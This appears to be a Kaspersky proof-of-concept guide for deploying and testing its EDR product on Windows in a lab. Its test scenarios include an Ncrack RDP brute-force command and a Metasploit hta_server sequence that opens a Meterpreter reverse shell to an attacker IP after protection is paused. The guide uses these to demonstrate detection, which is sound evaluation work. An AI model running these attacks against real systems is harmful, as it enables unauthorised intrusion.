Kaspersky NEXT EDR Foundations and Optimum for Windows
Proof of Concept guide
Kaspersky, 07.03.2024

Table of Contents
Introduction
  About this document
  What is Kaspersky NEXT EDR Foundations and Optimum for Windows
  About Administration consoles
Prepare the environment
  Review the hardware and software requirements
  Download required files
  Configure network and check account permissions
Setup and deploy
  Kaspersky Security Center and Kaspersky Security Center Web console (Expert View) deployment
    Kaspersky Security Center Administration Server and Kaspersky Security Center Web console (Expert View)
    Kaspersky Security Center Cloud Console (Expert View)
    Kaspersky Endpoint Security Cloud (Pro View)
  Kaspersky Security Center configuration
  Deploy protection for Windows devices
  Activation
  Update
Capability scenarios
  Kaspersky NEXT EDR Foundations for Windows
    Web Threat Protection
    Network Threat Protection
    AMSI Protection
    Exploit Prevention
    Web Control
    Device Control
    Anti-Bridging
    Application Control
  Kaspersky NEXT EDR Optimum for Windows
    EDR Optimum
    Adaptive Anomaly Control
    Full Disk Encryption
    USB File Level Encryption with portable file manager
    BitLocker management
Appendix A: POC success criteria
Appendix B: AMSI demonstration script

This guide relates to the following versions of Kaspersky products:
• Kaspersky Security Center 14.2
• Kaspersky Security Center Cloud Console 15.0.152
• Kaspersky Endpoint Security Cloud 24.6
• Kaspersky Endpoint Security for Windows 12.4
Introduction

About this document
This guide is intended to help you quickly deploy and configure the Kaspersky NEXT EDR Foundations and Optimum for Windows applications for evaluation. It guides you through detailed scenarios in a proof-of-concept environment to help you better understand how the solution works. The instructions provide an evaluation method for the most common endpoint security use cases.
This guide is intended for Kaspersky presales engineers and third parties wishing to evaluate the Kaspersky NEXT EDR Foundations and Optimum for Windows applications. It is assumed that the reader has:
1. Experience in systems administration.
2. Basic knowledge of computer networking.

What is Kaspersky NEXT EDR Foundations and Optimum for Windows
The Kaspersky NEXT EDR Foundations and Optimum for Windows solution is designed to protect physical, virtual, and cloud-based endpoints (desktops and servers), is enhanced with EDR functionality, and includes the following products:
• Kaspersky Endpoint Security for Windows (KES for Windows) provides comprehensive computer protection against various types of threats, including network and phishing attacks. Each type of threat is handled by a dedicated component. Components can be enabled or disabled independently of one another, and their settings can be configured. KES for Windows also serves as the EDR Optimum endpoint agent. Detailed information about the application is available in the Online Help.
• Kaspersky Security Center (KSC) is designed for the centralized execution of basic administration and maintenance tasks in an organization's network. The application gives the administrator access to detailed information about the organization's network security level and allows the configuration of all protection components built on Kaspersky applications.
You can use Kaspersky Security Center in the following ways:
• As an on-premises application: you install Kaspersky Security Center, including the Administration Server, on a local device and manage the network security system through the Microsoft Management Console-based Administration Console (MMC) or Kaspersky Security Center Web Console (Expert View).
• As a cloud service, either Expert View (formerly Kaspersky Security Center Cloud Console) or Pro View (formerly Kaspersky Endpoint Security Cloud): Kaspersky Security Center is installed for you in the cloud environment and Kaspersky gives you access to the Administration Server as a service. You manage the network security system through the cloud-based Administration Consoles: Pro View (formerly Kaspersky Endpoint Security Cloud Console) or Expert View (formerly Kaspersky Security Center Cloud Console).
Detailed information about each of these options is available in the Online Help.

About Administration consoles
The Kaspersky NEXT EDR Foundations and Optimum for Windows applications can be managed using four different consoles, depending on the implementation scheme (cloud or on-premises) described in the previous part of this guide, so it is crucial to understand what these consoles are. Let's look one more time.
When KSC is installed on-premises:
• Microsoft Management Console-based Administration Console (MMC)
• Expert View (via Kaspersky Security Center Web Console)
When KSC is a cloud service:
• Expert View (via Kaspersky Security Center Cloud Console)
• Pro View (via Kaspersky Endpoint Security Cloud Console)
To sum up: Pro View is only available as a cloud service, Expert View is available both as an on-premises installation and as a cloud service, and the MMC console is only available as an on-premises installation.
Prepare the environment

Review the hardware and software requirements
Kaspersky Security Center 14.2 and Network Agent: https://support.kaspersky.com/help/KSC/14.2/en-US/96255.htm
Kaspersky Security Center Cloud Console (Expert View): https://support.kaspersky.com/KSC/CloudConsole/en-US/166364.htm
Kaspersky Endpoint Security Cloud Console (Pro View): https://support.kaspersky.com/Cloud/1.0/en-US/123619.htm
Requirements for DBMS and Administration Server: https://support.kaspersky.com/help/KSC/14.2/en-US/92567.htm
Kaspersky Endpoint Security 12.4 for Windows: https://support.kaspersky.com/KESWin/12.4/en-US/127972.htm

Download required files
Distribution packages for all Kaspersky applications for Endpoint Protection are available at https://www.kaspersky.com/small-to-medium-business-security/downloads/endpoint. Download the full distribution package for Kaspersky Security Center 14.2 for Windows. Before running the downloaded installer, check that its Authenticode signature is valid and was issued to Kaspersky (for example with Get-AuthenticodeSignature in PowerShell).
Installation packages for Kaspersky Endpoint Security for Windows can be downloaded and created directly from the Kaspersky Security Center Administration Console, Kaspersky Security Center Web Console, Kaspersky Security Center Cloud Console or Kaspersky Endpoint Security Cloud Console.

Configure network and check account permissions
To be able to use all the Kaspersky NEXT EDR Foundations and Optimum for Windows features described in this guide, make sure that the required ports are open on the hosts. In this guide an on-premises installation with Expert View is used, so open ports accordingly. The full list of ports used for communication between Kaspersky applications is available at:
https://support.kaspersky.com/help/KSC/14.2/en-US/158830.htm
https://support.kaspersky.com/Cloud/1.0/en-US/208747.htm
https://support.kaspersky.com/KSC/CloudConsole/en-US/158830.htm
To install Kaspersky Security Center and/or a Network Agent, you must have Administrator permissions on the computer on which you are installing the product. More detailed information about the account permissions required for Kaspersky Security Center operation is available in the Online Help.
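The following PowerShell script is an added example and is not part of the original guide or of any Kaspersky tooling. It runs the pre-flight checks that this section asks for on the host where you are about to install the Administration Server (or on a future client, for the port-reachability part): local Administrator rights, the installed .NET Framework 4.x release, a SQL Server service, TCP reachability of the Administration Server ports, and, optionally, the Authenticode signature of the downloaded installer. The minimum .NET release (4.6.1, Release value 394254), the default port numbers (13000, 13291, 13299 and 8080) and the hostname ksc.lab.local are assumptions; confirm them against the requirements and ports pages linked above.

```powershell
# Added example, not from the original guide: pre-flight checks before installing
# Kaspersky Security Center 14.2 / Network Agent. Assumptions to verify against the
# linked requirements and ports pages: .NET Framework 4.6.1 (Release 394254) as the
# minimum, and the default TCP ports 13000 (Network Agent -> Administration Server),
# 13291 (MMC Administration Console -> Administration Server), 13299 (Web Console ->
# Administration Server) and 8080 (browser -> Web Console). 'ksc.lab.local' and the
# installer path are assumed values.

function Test-KscPrerequisites {
    param(
        [string] $AdministrationServer = 'ksc.lab.local',
        [int]    $MinDotNetRelease     = 394254,
        [int[]]  $ServerPorts          = @(13000, 13291, 13299, 8080),
        [string] $InstallerPath        = ''
    )
    $checks = [System.Collections.Generic.List[object]]::new()

    # 1. Installing KSC or Network Agent requires local Administrator rights.
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = [Security.Principal.WindowsPrincipal] $identity
    $isAdmin   = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    $checks.Add([pscustomobject] @{ Check = 'Local Administrator'; Detail = $identity.Name; Pass = $isAdmin })

    # 2. .NET Framework 4.x version, read from the Release DWORD the framework installer sets.
    $ndp     = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full' -ErrorAction SilentlyContinue
    $release = if ($ndp) { [int] $ndp.Release } else { 0 }
    $checks.Add([pscustomobject] @{ Check = '.NET Framework 4.x release'; Detail = $release; Pass = ($release -ge $MinDotNetRelease) })

    # 3. The Administration Server needs a SQL Server instance; the simplest lab case is a local one.
    $sql = @(Get-Service -Name 'MSSQL*' -ErrorAction SilentlyContinue)
    $checks.Add([pscustomobject] @{ Check = 'SQL Server service present'; Detail = ($sql.Name -join ', '); Pass = ($sql.Count -gt 0) })

    # 4. TCP reachability of the Administration Server ports from this host. Run this part on a
    #    client in another segment to validate the firewall rules between segments.
    foreach ($port in $ServerPorts) {
        $open = Test-NetConnection -ComputerName $AdministrationServer -Port $port -InformationLevel Quiet -WarningAction SilentlyContinue
        $checks.Add([pscustomobject] @{ Check = "TCP ${AdministrationServer}:${port}"; Detail = 'Administration Server'; Pass = [bool] $open })
    }

    # 5. Supply-chain check on the downloaded distribution package: the signature must be valid
    #    and the signer certificate must belong to Kaspersky.
    if ($InstallerPath -and (Test-Path -Path $InstallerPath)) {
        $sig     = Get-AuthenticodeSignature -FilePath $InstallerPath
        $subject = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '(unsigned)' }
        $ok      = ($sig.Status -eq 'Valid') -and ($subject -match 'Kaspersky')
        $checks.Add([pscustomobject] @{ Check = 'Installer Authenticode signature'; Detail = "$($sig.Status): $subject"; Pass = $ok })
    }
    return $checks
}

$report = Test-KscPrerequisites -AdministrationServer 'ksc.lab.local' -InstallerPath '.\ksc_14.2_full.exe'
$report | Format-Table -AutoSize
if ($report | Where-Object { -not $_.Pass }) {
    Write-Warning 'One or more prerequisites failed; fix them before running the installer.'
}
```

Run it in an elevated PowerShell session on the Administration Server host first; the port checks will only pass once the server is installed and listening, so before installation they serve to document which ports still need firewall rules.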
Setup and deploy
This section describes the installation process for each Kaspersky NEXT EDR Foundations and Optimum for Windows component. To deploy endpoint protection with centralized management, perform the following steps:
1. Deploy Kaspersky Security Center in one of the following available options:
a) Kaspersky Security Center Administration Server (on-premises)
b) Register for Kaspersky Security Center Cloud Console (Expert View)
c) Register for Kaspersky Endpoint Security Cloud (Pro View)
2. Deploy protection for Windows devices (Network Agent + Kaspersky Endpoint Security for Windows with the EDR component, for the Optimum tier license).
After successful installation of these applications, activate them and update the antivirus databases.
In this guide, the Kaspersky Security Center on-premises installation with Kaspersky Security Center Web Console (Expert View) is used.

Kaspersky Security Center and Kaspersky Security Center Web console (Expert View) deployment

Kaspersky Security Center Administration Server and Kaspersky Security Center Web console (Expert View)
This section describes how to install the Administration Server component. In this guide, the Kaspersky Security Center on-premises installation with Kaspersky Security Center Web Console (Expert View) is used.
1. Run the Kaspersky Security Center installation file. In the window that opens, select Install Kaspersky Security Center 14.2.
2. On the Welcome page click Next.
3. If the required version of .NET Framework is installed, you can proceed to the next step. Otherwise, install it.
4. Accept the terms of the EULA and Privacy Policy and click Next.
5. Select the type of installation on the cluster. For the purposes of this guide, local installation is used. Select Locally (install on this device only).
6. Select the installation type. In this guide, it is the Custom type. Click Next.
7. Select the components to install. Mobile Device Management is not required, so do not select it. Click Next.
8. Select Install both Administration Consoles and click Next.
9. Specify an infrastructure size. In this guide, from 1001 to 5000 networked devices is selected. Click Next.
10. Select a database server type. Click Next.
11. Specify the MS SQL Server parameters. If you do not have MS SQL Server installed on your computer, you can download and install it from the official Microsoft website. Click Next.
12. Choose an authentication mode. In this guide, the Microsoft Windows Authentication mode is used.
13. Specify a user account to start the Administration Server service, or leave the default. Click Next.
14. Specify an account for the Kaspersky Security Center services. Click Next. For a production deployment, use dedicated least-privilege service accounts for steps 13 and 14 rather than a personal or domain administrator account.
15. Specify a shared folder to be created. Click Next.
16. Specify the Administration Server connection settings. Click Next.
17. Select the Administration Server address to connect. Click Next.
18. Click Install to start the installation process.
19. Select a language for installing Kaspersky Security Center Web Console.
20. On the Welcome page of the Kaspersky Security Center Web Console Setup Wizard click Next.
21. Read and accept the terms of the EULA.
22. Specify the path to the installation folder.
23. Specify the Kaspersky Security Center Web Console connection settings. If you install Kaspersky Security Center Web Console on the same device as the Kaspersky Security Center Administration Server, leave the default settings.
24. Select Use default accounts and click Next.
25. Generate a new certificate. This is a self-signed certificate, which is sufficient for a proof of concept; in production, replace it with a certificate issued by a CA that your browsers trust.
26. Add a list of trusted Administration Servers. If you use one local Administration Server, you can proceed to the next step without modifying the settings.
27. Do not install Identity and Access Manager.
28. Click Install.
29. Make sure that the installation completed successfully. Click Finish to close the Wizard.
30. Wait for the installation to complete. Then choose whether to start the MMC-based Administration Console or Kaspersky Security Center Web Console. In this guide, Web Console is used. Click Finish.
31. The browser shows a certificate warning because Web Console presents the self-signed certificate generated in step 25. In the lab, proceed to the webpage; in production, resolve this warning with a trusted certificate rather than teaching users to click through it.
32. Enter your credentials and click Sign in.
After completing these steps, you have successfully installed Kaspersky Security Center Administration Server and Kaspersky Security Center Web Console (Expert View).

Kaspersky Security Center Cloud Console (Expert View)
For detailed information on how to register your workspace for Kaspersky Security Center Cloud Console (Expert View) and how to deploy Kaspersky endpoint protection to devices in your organization, refer to the Kaspersky Security Center Cloud Console Deployment Guide (you can request this guide from your local Kaspersky representative).

Kaspersky Endpoint Security Cloud (Pro View)
For information on how to register your workspace for Kaspersky Endpoint Security Cloud (Pro View), refer to the official documentation: https://support.kaspersky.com/Cloud/1.0/en-US/187780.htm

Kaspersky Security Center configuration
The subsequent Kaspersky Security Center configuration and Kaspersky endpoint protection deployment are similar for both Kaspersky Security Center Web Console on-premises (Expert View) and Kaspersky Security Center Cloud Console (Expert View). In this guide, the instructions and screenshots are prepared for Kaspersky Security Center Web Console (on-premises).
1. Accept the Hardening guide prompt.
2. When you log in to the Kaspersky Security Center Web Console you may be presented with the tutorial. You can go through it or close it; the tutorial can always be launched later from the Kaspersky Security Center Web Console. In this guide, we close the tutorial. The Quick Start Wizard now opens. Click Start to proceed to the next step.
3. Select whether to use a direct connection to the Internet or a proxy server.
4. On Step 2, wait for the check for required updates to complete and click Next.
5. Check the boxes for the areas of devices you want to protect and the OS of these devices.
6. Select the encryption key length to be used in the solutions. In this guide, Strong encryption (256-bit) is used.
7. Select the web plug-ins for the managed applications to install.
8. Make sure the plug-ins were installed successfully.
9. Select the installation packages to be downloaded and created. In this guide, we automatically download and create installation packages for the following applications:
a) Kaspersky Endpoint Security for Windows;
b) Network Agent for Windows.
10. Select whether to participate in KSN (Kaspersky Security Network, recommended) or not.
11. Select whether to add an active license for applications. In this guide, we will do that later.
12. Define the Update management settings and proceed to the next step.
13. At the bottom of the page click Create to create the tasks and policies for Kaspersky applications and wait for them to be created. Then click Next.
14. Specify an email address for error notifications and the Transport Layer Security usage and versions. In this guide, the Do not use TLS option is used, because email notifications are not configured. In a production environment, select the Always use TLS, check server certificate validity option.
15. Check that the initial network poll has completed successfully and proceed to the next step.
16. Clear the Run Protection Deployment Wizard flag and at the bottom of the page click Finish to close the Quick Start Wizard.
17. In Kaspersky Security Center Web Console go to Discovery & Deployment – Deployment & Assignment – Installation Packages. In the right pane switch to the In progress tab. You will see the installation packages for which you should accept the terms of the End User License Agreement (EULA).
Click on each package and accept the terms of the EULA.
18. Click the Properties icon next to the Administration Server.
19. On the General tab go to License keys and in the right pane click Select under the Current license section.
20. Click + Add a new license key, specify your Activation Code and click Send, enable the Automatically distribute license key to managed devices option, then click Close.
21. Select the added license key and close this window.
22. Click Save to apply the changes.
After completing these steps, you have successfully performed the initial configuration of Kaspersky Security Center.

Deploy protection for Windows devices
To deploy protection for Windows devices it is necessary to install:
• Network Agent (Kaspersky Security Center Administration Agent);
• Kaspersky Endpoint Security for Windows.
These applications can be installed either locally or remotely by means of Kaspersky Security Center or third-party tools. This section shows remote installation by means of Kaspersky Security Center.
1. Open the Kaspersky Security Center Web Console. Go to Discovery & Deployment – Deployment & Assignment – Installation Packages. Click on the Kaspersky Endpoint Security for Windows installation package – Settings – and in the Data Encryption section check the boxes for all the encryption components as well as the Endpoint Detection and Response Optimum component. Click Save. If you do not plan to go through the Encryption or EDR Optimum scenarios, you can skip this step.
2. Select the Kaspersky Endpoint Security for Windows installation package and click + Deploy.
3. Select the deployment method for the installation package. In this guide, Using the remote installation task is used.
4. Select the Network Agent for Windows distribution package to install it together with Kaspersky Endpoint Security for Windows within one task.
5. Specify the devices for installation. By default, network polling is performed immediately after Administration Server installation, so the discovered devices should already be listed.
6. Specify the remote installation task settings. You can leave all the settings at their defaults.
7. Select Do not restart the device.
8. Select Uninstall incompatible applications automatically.
9. Specify an administration group where the devices will be placed after the installation, if needed.
10. Specify the account that has permissions to install applications on the devices. This account needs local administrator rights on every target; use a dedicated, least-privilege deployment account rather than a domain administrator account, because the task holds its credentials.
11. Click Run the task after the Wizard finishes and close the task creation wizard. The task will be started.
12. Wait a few minutes. Go to Devices – Tasks, select the task you have just created and click Result. Check that the task has completed.
After completing these steps, you have successfully installed Network Agent for Windows and Kaspersky Endpoint Security for Windows on the target Windows devices.

Activation
You can activate applications within the deployment process or during the Kaspersky Security Center initial configuration. If you have not done this already, you can add a license key later with an activation task. More detailed information about licensing and activation is available in the Online Help.

Update
After installing Kaspersky Endpoint Security, you must update the databases to ensure that the latest bases and signatures are in use. We recommend configuring your update tasks to run on completion of the Download updates to the Administration Server repository task (Kaspersky Security Center Administration Server, on-premises) or When new updates are downloaded to the repository (Kaspersky Security Center Cloud Console). More detailed information about downloading and installing updates is available in the Online Help.

Capability scenarios

Kaspersky NEXT EDR Foundations for Windows
The following scenarios are designed to help you experience the key features of Kaspersky applications for Windows devices within the Kaspersky NEXT EDR Foundations for Windows license bundle.
They highlight the most important functionality and show how you can use these features in your own environment. You can go through them in any order or start with the one you are most interested in.
a. Web Threat Protection
b. Network Threat Protection
c. AMSI Protection Provider
d. Exploit Prevention
e. Web Control
f. Device Control
g. Anti-Bridging
h. Application Control

Web Threat Protection
In this scenario, we will demonstrate that Kaspersky Endpoint Security for Windows protects your computer from web threats.
Evaluation steps:
1. Enable the Web Threat Protection component in the administration policy.
2. Try to access a malicious web page (a test page in this case).
3. Review the events.
Expected results: Access to the malicious web page is blocked by the Web Threat Protection component.
Instructions:
1. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Open the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Essential Threat Protection section and in the right pane click on Web Threat Protection.
2. Check that Web Threat Protection is enabled. If not, enable it and close the policy properties.
3. On the protected machine open a web browser and try to access one of the following pages:
https://www.kaspersky.com/test/wmuf
https://www.kaspersky.com/test/aphish_h
Check that they are blocked by Web Threat Protection. These are harmless test pages that Kaspersky publishes to exercise web-threat detection.
4. You can also view the event either in the local Kaspersky Endpoint Security GUI or in the Kaspersky Security Center Web Console. To do that in the Kaspersky Security Center Web Console, go to Monitoring & Reporting – Event Selection – click Recent events. Check that you see the corresponding event.
After completing these steps, you have successfully demonstrated that Kaspersky Endpoint Security for Windows can protect the computer from web threats.
Network Threat Protection
In this scenario, we will demonstrate that Kaspersky Endpoint Security for Windows can detect and block network attacks. For the purposes of this guide, the Ncrack utility and Zenmap/Nmap are used to simulate an RDP brute-force attack and a port scan, respectively, against a protected computer. You can find more information about using these utilities on their official websites. Run them from a separate "attacker" host, not from the protected computer itself, because the expected result is that the attacker's IP address is blocked.
Evaluation steps:
1. Make sure that Network Threat Protection is enabled.
2. Download and install Ncrack on the "attacker" computer.
3. Perform the RDP brute-force attack simulation against the protected system.
4. Download Zenmap and perform the port scan.
5. Check the event log.
Expected results: Network Threat Protection detects the network attack and blocks the attacking computer.
Instructions:
1. On the protected computer open Settings – System – Remote Desktop and turn on Enable Remote Desktop. Turn it off again after the test if the machine does not normally expose RDP.
2. Switch to Kaspersky Security Center. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Open the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Essential Threat Protection section and in the right pane click on Network Threat Protection.
3. Make sure Network Threat Protection is enabled. Otherwise, enable it. Enable the Treat port scanning and network flooding as attacks option. Set the Add the attacking computer to the list of blocked computers for option to 1 min. Save and close the policy properties. The short block interval is for the lab only, so that the attacker host is unblocked quickly between tests; keep a longer interval in production.
4. Download and install the Ncrack utility. Open a command prompt in the Ncrack installation folder.
5. Run the following command:
ncrack -v win10pro64:3389
where win10pro64 is the name of the protected host. Usually you would specify the files containing usernames and passwords with the -U and -P options; without them Ncrack falls back to its built-in default lists, which is enough for this test.
6. Wait a while and press CTRL+C.
Make sure that the attack has been detected and blocked.
7. Download and install the Zenmap utility or its command-line equivalent Nmap. Run Zenmap and start an applicable port scan against the protected host.
8. Make sure that the port scan has been detected and that you see the events in Monitoring – Reports – Network Threat Protection in the local Kaspersky Endpoint Security GUI.
9. You can also view the events in the Kaspersky Security Center Web Console. Go to Monitoring & Reporting – Event Selection – click Recent events. Check that there are events related to the recent network attack detection.
In this scenario, we have demonstrated that Kaspersky Endpoint Security for Windows can detect and block network attacks.

AMSI Protection
The Antimalware Scan Interface (AMSI) is a generic interface standard that allows applications and services to integrate with any antimalware product present on a computer. It provides enhanced malware protection for users and their data, applications, and workloads. AMSI is antimalware-vendor agnostic and designed to allow the most common malware scanning and protection techniques provided by today's antimalware products to be integrated into applications. It supports a request/response structure allowing for file and memory or stream scanning, content source URL/IP reputation checks, and other techniques (source: https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx). In practice, this means that script hosts such as PowerShell hand script content to the registered antimalware provider at run time, immediately before it is executed, so a provider can judge the code in the form it will actually run.
In Kaspersky Endpoint Security for Windows there is a dedicated AMSI Protection component. In this scenario, we will demonstrate that Kaspersky Endpoint Security for Windows can detect malicious scripts using AMSI.
Evaluation steps:
1. Create a sample script and try to run it.
2. Check the results.
Expected results: Execution of the malicious script is blocked and you see the following message in PowerShell: This script contains malicious content and has been blocked by your antivirus software. Test succeeded.
Instructions:
1. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Open the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Essential Threat Protection section and in the right pane click on AMSI Protection.
2. Make sure AMSI Protection is enabled. Otherwise, enable it and close the policy properties.
3. Switch to a protected computer. Run PowerShell as Administrator and execute the following cmdlet:
Set-ExecutionPolicy Bypass
Press Y or A to proceed. Run this way, the change applies to the LocalMachine scope and persists; for a lab machine you can limit it to the current session by adding -Scope Process, and in any case restore the original policy afterwards. Execution policy is not a security boundary (it only controls whether script files are loaded), and AMSI scanning happens regardless of it.
4. Create a PowerShell script and paste the body of the script from Appendix B. This script is artificial and does not contain any malware.
5. Run the script in PowerShell. Check that its execution has been blocked.
6. You can also view the event either in the local Kaspersky Endpoint Security GUI or in the Kaspersky Security Center Web Console. To do that in the Kaspersky Security Center Web Console, go to Monitoring & Reporting – Event Selection – click Recent events. Check that you see the corresponding event.
After completing these steps, you have successfully demonstrated that Kaspersky Endpoint Security for Windows can detect malicious scripts using AMSI.

Exploit Prevention
In this scenario, we will demonstrate that Kaspersky Endpoint Security for Windows detects and blocks exploits. To do that we will use the Metasploit Framework within Kali Linux. You can also download and install the Metasploit Framework on your own computer from https://www.metasploit.com/download.
In this scenario, we will use a web server that hosts an HTML Application (HTA) which, when opened, runs a payload (Meterpreter) via PowerShell. More information about the module is available at:
• https://www.rapid7.com/db/modules/exploit/windows/misc/hta_server
Strictly speaking, hta_server does not exploit a software vulnerability: it relies on the user opening the HTA, and the resulting launch chain (mshta.exe starting PowerShell, which starts the Meterpreter payload) is what gets detected.
Note that this scenario is intended only for Proof of Concept purposes. DO NOT USE IT FOR OTHER MEANS!
Environment description:
• Victim computer: fresh installation of Windows 10 21H1 (OS Build 19043.1766).
• Attacker host: Kali Linux 2022 with the Metasploit Framework (https://www.kali.org/downloads/).
Evaluation steps:
1. Stop the Kaspersky protection.
2. Exploit a vulnerability.
3. Resume protection and disable the essential components of protection.
4. Try to exploit the vulnerability.
5. Check the results.
Expected results: Kaspersky Endpoint Security for Windows detects and blocks the attack with the help of the Exploit Prevention component.
Instructions:
1. On the victim computer right-click on the Kaspersky Endpoint Security for Windows icon in the tray and click Pause protection and control… Also make sure that Windows Defender is disabled, so that the first run shows an unprotected baseline.
2. Switch to Kali Linux and start the Metasploit Framework. In the Metasploit Framework console run the following commands in sequence:
use exploit/windows/misc/hta_server
set target 1
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.160.201.59
exploit
where target 1 means PowerShell x64 and 10.160.201.59 is the IP address of the Kali Linux host.
3. Switch to the victim computer. Open a browser and enter in the address bar the URL that the module printed in the previous step (the Local IP line, of the form http://<LHOST>:<SRVPORT>/<name>.hta). In the window that appears, click Open to run the file.
4. Click Run to open the file.
5. Switch to Kali Linux. In the Metasploit Framework console note that a Meterpreter session has opened.
6. Press Enter. Run the following command:
sessions 2
where 2 is the number of the session. Then enter in sequence:
shell
calc.exe
to show that we have successfully gained access to the victim computer and started the calculator.
7. Check that the calculator has started on the victim computer.
8. Type exit twice (once to leave the shell, once to close the Meterpreter session) and then jobs -K to stop all created jobs.
9. Switch to Kaspersky Security Center. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section.
Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Essential Threat Protection section and in the right pane disable all the components in the section. Save the policy and close its properties. This leaves Exploit Prevention (which belongs to the Advanced Threat Protection section) as the component that has to stop the attack.
10. Go to Devices – Managed Devices. Double-click on the victim computer – Applications. In the right pane select Kaspersky Endpoint Security for Windows and resume protection. Close the properties of the victim computer.
11. Switch to Kali Linux. Repeat steps 2-4 of this scenario to exploit the vulnerability.
12. Note that the exploit has been detected and blocked. You can also view the event either in the local Kaspersky Endpoint Security GUI or in the Kaspersky Security Center Web Console. To do that in the Kaspersky Security Center Web Console go to Monitoring & Reporting – Event Selection – click Recent events. Check that you see the corresponding event.
After completing these steps, you have successfully demonstrated that Kaspersky Endpoint Security for Windows can detect and block exploits.

Web Control
Many companies are concerned about their Internet traffic consumption. When analyzing the company's Internet traffic, security administrators may want to deny users access to social networks. This can be done with Web Control, available in Kaspersky Endpoint Security for Windows. In this evaluation scenario, we will block access to social networks for all users.
Evaluation steps:
1. Configure and apply the policy.
2. Attempt to access a restricted web resource from the user's computer.
Expected results: Access to the specified site is blocked.
Instructions:
1. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Security Controls section and in the right pane click on Web Control.
2. Make sure that Web Control is enabled and click + Add in the Rule List section.
3. Specify the rule parameters:
   Name: Social Networks
   Status: Active
   Action: Block
   Filter type: By content categories
   Content category: Internet communication – Social networks
   Addresses: Apply to all addresses
   Users: Apply to all users
   Rule schedule: Always
   Save the rule and apply the policy.
4. Switch to a managed device. Try to access facebook.com from the protected machine. You will see the Access Denied banner.
5. You can also view the event either in the local Kaspersky Endpoint Security GUI or in the Kaspersky Security Center Web Console. To do that in the Kaspersky Security Center Web Console go to Monitoring & Reporting – Event Selection – click Recent events. Check that you see the corresponding event.
After completing these steps, you have successfully demonstrated that Kaspersky Endpoint Security for Windows can block access to a forbidden category of web resources.

Device Control
In this scenario, we will demonstrate how to restrict the use of certain types of devices on managed computers using Kaspersky Endpoint Security for Windows.
Evaluation steps:
1. Configure a policy to restrict the use of CD/DVD drives.
2. Insert a disk into a CD/DVD drive of the protected system.
3. Review the event log.
Expected results: Use of the CD/DVD drive will be blocked by Kaspersky Endpoint Security for Windows.
In most cases it is common to show the restriction for USB devices; however, in a cloud environment it is easier to demonstrate the Device Control functionality with CD/DVD drives. The demonstration process is the same for USB devices and other types of devices.
Instructions:
1. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Security Controls section and in the right pane click on Device Control.
2. Check that Device Control is enabled and click Access rules for devices and Wi-Fi networks.
3. Click on CD/DVD drives.
4. In the Configuring device access rule window switch the type of access from Depends on bus to Block and save the policy changes.
5. Switch to a managed computer. Try to insert a CD/DVD disk, or mount an ISO image, in a CD/DVD drive of the protected system. The use of the disk will be blocked and you will see a notification that the operation with the device is prohibited.
6. You can also view the event either in the local Kaspersky Endpoint Security GUI or in the Kaspersky Security Center Web Console. To do that in the Kaspersky Security Center Web Console go to Monitoring & Reporting – Event Selection – click Recent events. Check that you see the corresponding event.
After completing these steps, you have successfully demonstrated that Kaspersky Endpoint Security for Windows can block access to forbidden types of devices.

Anti-Bridging
The Anti-Bridging feature in Kaspersky Endpoint Security for Windows prohibits the use of a network interface if another active network interface is present in the system, so a network bridge between the interfaces (for example, a wired corporate connection and a Wi-Fi or mobile connection used at the same time) cannot be created. In this scenario, we will demonstrate that Kaspersky Endpoint Security for Windows can block the simultaneous use of different network interfaces on the protected computer.
Evaluation steps:
1. Enable two network interfaces of the same type on a protected device.
2. Enable the Anti-Bridging feature.
3. Check the results.
Expected results: The use of the second network interface is denied by the Anti-Bridging feature. One of the network interfaces will be disabled after enabling the feature.
Instructions:
1. Check that you have multiple network interfaces enabled.
2. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section.
Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Security Controls section and in the right pane click on Device Control.
3. In the Device Control properties click Anti-Bridging.
4. Enable Anti-Bridging and select the interface types to be affected. Save the changes and close the policy properties.
5. Once the policy is applied, one of the network interfaces becomes disabled.
6. The active user will see a notification. If you try to enable the disabled interface, the other one will become disabled immediately.
7. You can also view the event either in the local Kaspersky Endpoint Security GUI or in the Kaspersky Security Center Web Console. To do that in the Kaspersky Security Center Web Console go to Monitoring & Reporting – Event Selection – click Recent events. Check that you see the corresponding event.
After completing these steps, you have successfully demonstrated that Kaspersky Endpoint Security for Windows can block the simultaneous use of different network interfaces on the protected computer.

Application Control
This scenario demonstrates how Application Control can block the launch of untrusted programs. In this scenario, you will configure a default deny policy with the minimum set of applications allowed to start. Then you will add Internet browsers to the Allowlist.
Evaluation steps:
1. Configure a policy to enable default deny (Allowlist).
2. Check that the startup of an application (Google Chrome) that is not in the Allowlist is blocked.
3. Create a category for allowed applications and add it to the Allowlist.
4. Check whether the application startup is still blocked.
Expected results: The launch of the application that is not in the Allowlist is blocked. After adding the application to the Allowlist, the launch of the application is allowed.
Instructions:
1. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section.
Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Security Controls section and in the right pane click on Application Control.
